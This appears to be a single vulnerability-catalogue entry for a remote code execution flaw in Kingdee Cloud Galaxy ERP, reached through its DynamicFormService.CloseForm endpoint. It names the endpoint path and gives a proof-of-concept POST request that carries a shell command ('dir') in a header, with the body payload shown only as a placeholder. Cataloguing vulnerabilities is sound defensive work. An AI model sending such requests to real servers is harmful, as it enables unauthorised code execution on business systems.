vendor = "金蝶"
name = "金蝶云星空 DynamicFormService.CloseForm.common.kdsvc 远程代码执行"
type = "RCE"
version = "未知"
path = "/k3cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DynamicForm.DynamicFormService.CloseForm.common.kdsvc"
detail = "POST /k3cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DynamicForm.DynamicFormService.CloseForm.common.kdsvc HTTP/1.1 cmd:dir {\"ap0\":\"AAAAAAAA\"}"
fix = "未知"
date = "0716"
label = "1day"
verifier = "AdySec"
